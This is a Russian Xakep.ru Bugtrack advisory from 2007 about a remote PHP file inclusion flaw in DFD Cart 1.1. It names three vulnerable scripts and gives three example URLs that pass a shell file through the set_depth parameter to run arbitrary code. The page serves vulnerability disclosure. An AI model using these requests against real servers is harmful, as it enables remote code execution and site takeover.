Журналы	Новости	Форум	Видео	Life Xakep	Live (блоги)

Bugtrack	Статьи	Блог	Поиск	English

$1000 НА ANDROID: ЗАРАБАТЫВАЕМ НА ПРИЛОЖЕНИЯХ ДЛЯ МОБИЛЬНОЙ ПЛАТФОРМЫ ОТ GOOGLE
27.07.2010

Пара вечеров экспериментов и неожиданно удачная идея позволили за 2 месяца заработать более $1000. Это гораздо больше, чем я мог ожидать...

ФАБРИКА СПЛОИТОВ
26.07.2010

Откуда берутся сплоиты? Задумывался ли ты, каким образом тусклая новость из багтрака превращается в реально работающую отмычку...

PHP-инклюдинг в DFD Cart

Дата: 24.09.2007 | Версия для печати | Послать друзьям | Комментарии Автор: semu
Добавить в:

| Google Translate

Программа: DFD Cart 1.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных сценариями product.control.config.php, customer.browse.list.php и customer.browse.search.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://localhost/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://localhost/shell.txt?
http://localhost/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://localhost/shell.txt?
http://localhost/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://localhost/shell.txt?

Уязвимости в DFD Cart (всего 1)

В энциклопедии: PHP-инклюдинг

СЛЕДУЮЩИЕ СТАТЬИ

Нарушение конфиденциальности информации в Apple Safari
Отказ в обслуживании в Arora
Переполнение буфера в QQPlayer
Отказ в обслуживании в Unreal Tournament
Отказ в обслуживании в Microsoft DirectX
Переполнение буфера в Haihaisoft PDF Reader ActiveX
Межсайтовый скриптинг в Pixie CMS
Межсайтовый скриптинг в Pligg CMS
Межсайтовый скриптинг в PyroCMS
Межсайтовый скриптинг в ImpressCMS

ПРЕДЫДУЩИЕ СТАТЬИ

Переполнение буфера в Xitami Web Server
SQL-инъекция в Black Lily
SQL-инъекция в Black Lily
SQL-инъекция в phpFullAnnu
PHP-инклюдинг в Wordsmith
PHP-инклюдинг в PHP-Nuke addon Nuke Mobile Entartainment
PHP-инклюдинг в helplink
Переполнение буфера в EasyMail MessagePrinter Object
PHP-инклюдинг в neuron news
Переполнение буфера в Lighttpd

ОБСУЖДЕНИЕ СТАТЬИ

Логин:
Пароль:
Регистрации на сервере не требуется, вы можете использовать гостевой доступ. Если у вас есть форумный логин, вы можете использовать его. Если нет, то вы можете зарегистрироваться на forum.xakep.ru ВСЕ ПОСТЫ ПРОХОДЯТ ПРЕМОДЕРАЦИЮ, не ждите их мгновенного появления в списке комментариев.

Для отправки сообщения введите код, указанный на картинке

Заголовок

Сообщение

Keywords: zPOSTz zSCOLOURz, zHACKz, zSOFTz, zNEWSz, zYANDEXz VCT66; z40328z
Для Авторов: edit

delete

Архив: последний выложеный номер

2010 год | 2009 год | 2008 год

2007 год | 2006 год | 2005 год

2004 год | 2003 год | 2002 год

2001 год | 2000 год | 1999 год

Все журналы на одной странице